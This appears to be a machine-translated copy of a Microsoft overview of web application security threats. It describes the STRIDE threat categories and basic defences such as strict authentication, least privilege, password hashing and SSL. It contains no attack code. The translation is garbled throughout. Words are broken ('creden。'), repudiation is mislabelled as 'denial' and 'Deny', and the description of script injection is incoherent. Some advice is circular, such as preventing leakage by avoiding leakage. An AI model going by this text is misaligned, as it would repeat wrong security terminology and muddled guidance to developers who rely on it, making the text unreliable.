Web Application Security Threats Overview (Visual Studio)

If an unknown user can access your Web ApplicationProgram, It is almost certain that malicious users will try to obtain unauthorized access to your application. For servers that allow public access to the Internet, someone usually checks whether they have security vulnerabilities every day. Therefore, we recommend that you take preventive measures and establish a security system in all web applications.

Writing SecurityCodeAnd more details on best practices for ensuring application security, for more information, see writing security code and guidance from Microsoft patterns and practices, a book written by Michael Howard and David LeBlanc.

Security technology is only part of the solution

Security is only part of the solution. Another important part is adequacy. Even if your system has many security measures, You need to closely monitor it in the following ways:

• Monitor the event logs of your system. Monitor repeated login attempts to the system or excessive requests to the web server.

• Use the latest security updates from Microsoft Windows and Internet Information Service (IIS), and any other updates from Microsoft SQL Server or other data sources that may be used by applications, keep the application server up to date.

Threat Model

An important part of developing safer applications is understanding the threats to them. Microsoft has developed a method for classifying threats: Electronic spoofing, tampering, denial, information leakage, denial of service, and privilege escalation (STRIDE ). The following sections briefly describe these threats and how they are applied to Web applications.

Electronic Spoofing

"Electronic spoofing" refers to simulating users or processes without authorization. In short, e-spoofing can be used to type creden。 of other users. A malicious user may also change the content of a cookie to pretend that it is another user or that the cookie is from another server.

In general, you can prevent electronic spoofing by using strict authentication. Whenever someone requests access non-public information, make sure that their identities are consistent with those claimed. You can also take security measures on creden。 to prevent electronic spoofing. For example, do not store passwords or other sensitive information in cookies, Because malicious users can easily find or modify them.

Tampering

"Tampering" means modifying or deleting resources without authorization. For example, malicious users can access your website and change files to make the web page invisible. The indirect method of tampering is to use scripts. A malicious user tries to obtain the code (SCRIPT) to be executed by shielding it from user input in the form or by blocking it as a link.

The main method to prevent tampering is to use Windows security to lock files, directories, and other Windows resources. Applications should also run with minimal privileges. No trust in any information from users or even databases helps prevent script exploitation. Whenever you obtain information from untrusted sources, make sure that it does not contain any executable code for processing.

Deny

A "denial" threat means that the entity involved in the transaction processing cannot prove the facts after the transaction is processed. In Web applications, this can simulate the creden。 of innocent users. You can use strict authentication to prevent denial. In addition, the Windows logging function is used to save audit trails for any activity on the server. For more information, see record applications, servers, and security events.

Information Leakage

Information Leakage only refers to the theft or leakage of confidential information. A typical example is password theft, but it can involve access to any files or resources on the server.

The best way to prevent information leakage is to avoid information leakage. For example, if you do not store passwords, malicious users cannot steal them. (Another way to store passwords is to store only the hash of passwords. When a user provides creden, You can hash the user's password and only compare the two .)

If you do want to store sensitive information, use Windows Security to ensure its security. As always, you should use authentication to ensure that only authorized users can access restricted information. If sensitive information must be exposed, it is recommended that you encrypt it when storing the information, and use Secure Socket Layer (SSL) to encrypt the information when it is sent to or from the browser.

Denial of Service

Denial-of-Service (DoS) attacks are intended to cause lower availability of applications. A typical example is to overload web applications and make them unable to serve common users. Or, malicious users may only attempt to cause a fault on your server.

IIS allows you to adjust an application, that is, it limits the number of requests that will provide services to it. You may be able to deny access to known malicious users or IP addresses. To keep applications online, you must run powerful code. You should fully test your application and make appropriate responses to error conditions wherever possible.

Privilege Escalation

The "Privilege Escalation" attack means to use malicious means to obtain more permissions than normal permissions. For example, in a successful privilege escalation attack, malicious users attempt to obtain management permissions on the Web server so that they can access any data on the server and control server functions.

To prevent privilege escalation, run the application in the context with the least privilege (if feasible ). For example, it is recommended that you do not run ASP. NET applications as a system (Management) user.